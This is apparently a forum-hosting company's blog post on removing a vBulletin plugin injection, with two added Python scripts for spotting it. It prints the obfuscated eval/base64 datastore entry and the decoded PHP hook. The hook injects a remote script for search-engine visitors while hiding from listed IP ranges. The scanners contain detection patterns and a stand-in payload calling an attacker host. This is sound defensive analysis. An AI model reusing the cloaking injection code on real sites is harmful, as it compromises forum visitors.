Cleaning up vBulletin Script Injections

We've run across this hard-to-find script a few times in the past few weeks. The script only fires under specific conditions on the referrer and the user-agent. While it's hard to find, the fix is simple.

It happens like this: a user comes to the forum from a Google search results page (SERP) and is greeted with this payload:
<script type="text/javascript" src="http://www.pixxxxoons.org/ijr.js

The script was loaded in vBulletin's headinclude template. Now for the fun part: a search of the files did not find it. A database restore won't fix it, and searching for terms representative of encoded values (eval, base64, etc.) came up blank too.

What happens is that the malware rewrites the theme code itself, which makes detection difficult. We realized this was happening after finding that the site wasn't responding to two scripts in the headinclude.

The fix is straightforward: the malware installs a plugin named "vBulletin_hooks" and loads it globally. All that's needed is to remove the plugin, reset the datastores, and you are done.

If you're a bit curious and want to check the entire process, start by looking inside the database.

Using phpMyAdmin, search the entire database for "%eval%".

That search should bring up several entries. We started with the datastore table ("eval" strings there load together with the template), and there we found this, which looked a bit odd:

$xhTuAS = "\x62"."\x61"."\x73"."\x65".@eval($xhTuAS("DQpmdW5jdGlvbiBISGhwZ0h..
zY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiIHNyYz1cImh0dHA6Ly93d3cucGlzZXptYWt..
+PC9zY3JpcHQ+Iiwkb3V0cHV0KSk7DQp9DQpmdW5jdGlvbiB4ZnJFbHVhKCkgew0KaWYocHJlZ"));
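That entry also explains why the earlier plaintext search came up blank: the name of the decoding function is assembled at runtime from hex escapes ("\x62"."\x61"."\x73"."\x65" spells "base"), so "base64_decode" never appears literally anywhere in the database. The scanner below is an added example, not URLJet's own tooling. It takes rows exported from the plugin and datastore tables, resolves the hex escapes and string concatenation first, decodes any long base64 argument it finds, and reports what it sees. The sample rows, the stand-in payload and the hostname attacker-host.invalid are constructed placeholders; only the indicator logic is the point.

```python
import base64
import re

# Hex escapes are the reason a plain-text search for "base64_decode" found
# nothing on the infected forum: the call name is assembled at runtime from
# "\x62"."\x61"... and never appears as a literal.
HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')
STRING_JOIN = re.compile(r'"\s*\.\s*"')             # "ba"."se" -> "base"
B64_BLOB = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')  # long base64 runs
SUSPICIOUS_CALLS = ("eval", "base64_decode", "gzinflate", "str_rot13")
CLOAKING_VARS = re.compile(r'HTTP_REFERER|HTTP_USER_AGENT|REMOTE_ADDR')


def unescape_hex_strings(src):
    """Resolve hex escapes and merge "a"."b" concatenations so hidden names show up."""
    decoded = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)
    return STRING_JOIN.sub("", decoded)


def decode_base64_blobs(src):
    """Decode every long base64 run that turns into readable text."""
    decoded = []
    for blob in B64_BLOB.findall(src):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or binary: ignore
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            decoded.append(text)
    return decoded


def scan_row(src):
    """Indicators for one plugin/datastore row; they are review hints, not verdicts."""
    indicators = []
    if HEX_ESCAPE.search(src):
        indicators.append("hex-escaped string")
    plain = unescape_hex_strings(src)
    for call in SUSPICIOUS_CALLS:
        # direct call (eval(...)) or the name stored in a string for $f(...) style calls
        if re.search(r'\b%s\s*\(' % re.escape(call), plain) or ('"%s"' % call) in plain:
            indicators.append(call)
    decoded = decode_base64_blobs(plain)
    for text in decoded:
        if re.search(r'<script', text, re.I):
            indicators.append("script tag in decoded payload")
        if CLOAKING_VARS.search(text):
            indicators.append("cloaking on referer/user-agent/ip")
    return {"indicators": indicators, "decoded": decoded}


def scan_rows(rows):
    """rows: iterable of (table, row_id, text). Returns only the rows with indicators."""
    flagged = []
    for table, row_id, text in rows:
        report = scan_row(text)
        if report["indicators"]:
            flagged.append((table, row_id, report["indicators"]))
    return flagged


# Constructed sample rows standing in for a database export. The payload is
# base64 of a harmless stand-in with the same shape as the decoded hook code.
PAYLOAD_PHP = (
    'if (preg_match("#google#", $_SERVER["HTTP_REFERER"])) { $output = str_replace("</head>", '
    '"<script src=\\"http://attacker-host.invalid/ijr.js\\"></script></head>", $output); }'
)
OBFUSCATED_ROW = (
    '$xhTuAS = "\\x62"."\\x61"."\\x73"."\\x65"."\\x36"."\\x34"."\\x5f"'
    '."\\x64"."\\x65"."\\x63"."\\x6f"."\\x64"."\\x65";'
    '@eval($xhTuAS("' + base64.b64encode(PAYLOAD_PHP.encode()).decode() + '"));'
)
SAMPLE_ROWS = [
    ("datastore", "options", '$vbulletin->options["contactusemail"] = "admin@example.com";'),
    ("plugin", 17, OBFUSCATED_ROW),
]

if __name__ == "__main__":
    for table, row_id, indicators in scan_rows(SAMPLE_ROWS):
        print(table, row_id, ", ".join(indicators))
```

To use it on a real forum, export the plugin and datastore tables (phpcode and data columns respectively) and feed each row to scan_rows; anything flagged with "hex-escaped string" or a decoded payload containing a script tag deserves a close look before you rebuild the datastores.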

After decoding the base64 string, this is what it was up to:

// Hook body decoded from the datastore entry. Appends a remote script tag
// right after the forum's own connection-min.js include in the rendered page.
function HHhpgHoev($output) {
    $find_me = 'connection-min.js?v=387?>';
    return ($output = str_replace($find_me, $find_me."\r\n<script type=\"text/javascript\"
src=\"http://www.pisezmakoons.org/ijr.js? ", $output));
}
// True only when the visitor arrived from a search engine in a common browser
// (the referrer list is truncated here, as in the original post).
function xfrElua() {
    if(preg_match('#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|…', $_SERVER['HTTP_REFERER'])) {
        if(preg_match('#msie|myie|ie|firefox|opera|media center#i', $_SERVER['HTTP_USER_AGENT'])) return true;
    }
}
// True when the visitor's address starts with one of these prefixes; the
// injection is withheld from those visitors (list truncated as in the post).
function kOBFvnrcO() {
    $a = array('216.239.','209.85.','173.255.','173.194.','89.207.','74.125.', …);
    foreach($a as $b) {
        if(preg_match("/^$b/i", $_SERVER['REMOTE_ADDR'])) return true;
    }
}
// The injection fires only for search-engine visitors outside the excluded ranges.
if(!empty($_SERVER['HTTP_REFERER'])) {
    if(xfrElua() and !kOBFvnrcO()) {
        $output = HHhpgHoev($output);
    }
}

You know the rest: a lot of work. Luckily, the fix was easy.

You know your site has the infection if you Google it, click the result on the Google search page, and it takes you back to the Google home page.
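Because the hook only fires for the referrer and browser combination shown above, a plain fetch of the forum looks clean. The check below is an added example, not part of the post and not URLJet's tooling: it fetches a page once with a neutral client and once with the search-engine referrer and a Firefox user-agent, then reports external script hosts that only the second request receives. The forum hostname, the sample pages and attacker-host.invalid are constructed placeholders.

```python
import re
from urllib.parse import urlparse
from urllib.request import Request, urlopen

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)', re.I)

# Headers of a visitor arriving from a search result in a common browser;
# the injected hook on the forum only activated for that combination.
PROBE_HEADERS = {
    "Referer": "https://www.google.com/search?q=forum",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0",
}
BASELINE_HEADERS = {"User-Agent": "cloak-check/1.0"}  # no referrer, not a browser UA


def external_script_hosts(html, site_host):
    """Hostnames of <script src=...> tags pointing away from the forum's own host."""
    hosts = set()
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname  # None for relative paths like /clientscript/x.js
        if host and host.lower() != site_host.lower():
            hosts.add(host.lower())
    return hosts


def cloaked_script_hosts(baseline_html, probe_html, site_host):
    """Script hosts served only to the search-engine visitor: the cloaked injection."""
    return (external_script_hosts(probe_html, site_host)
            - external_script_hosts(baseline_html, site_host))


def fetch(url, headers):
    """Fetch a page with the given headers (network; the offline sample below skips this)."""
    with urlopen(Request(url, headers=headers), timeout=20) as resp:
        return resp.read().decode("utf-8", "replace")


def check_site(url):
    """Fetch the page twice and return script hosts that only the probe request sees."""
    site_host = urlparse(url).hostname
    return cloaked_script_hosts(fetch(url, BASELINE_HEADERS), fetch(url, PROBE_HEADERS), site_host)


# Constructed sample pages standing in for the two fetches.
SITE_HOST = "forum.example-forum.invalid"
CLEAN_HTML = (
    '<html><head>'
    '<script type="text/javascript" src="/clientscript/vbulletin-core.js"></script>'
    '<script type="text/javascript" src="//cdn.example-forum.invalid/connection-min.js?v=387"></script>'
    '</head><body>forum</body></html>'
)
INJECTED_HTML = CLEAN_HTML.replace(
    '</head>',
    '<script type="text/javascript" src="http://attacker-host.invalid/ijr.js"></script></head>')

if __name__ == "__main__":
    # Offline demonstration; for a live check call check_site("https://your-forum.example/").
    print(cloaked_script_hosts(CLEAN_HTML, INJECTED_HTML, SITE_HOST))
```

Run the live check from an ordinary connection: the decoded hook withholds the injection from a list of address prefixes, so a probe from one of those ranges would report a clean page regardless. An empty set after removing the plugin and resetting the datastores is the confirmation you want.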

At URLJet, we offer professional, reliable managed forum hosting for some of the world's largest forums, including Fortune 500 companies and even professional sports teams. vBulletin is all we do, all day, every day. Trust the vBulletin experts at URLJet to host your vBulletin forum. We guarantee we can run your forum faster, better, and more reliably than anyone… PERIOD! Email us at sales@urljet.com to get started!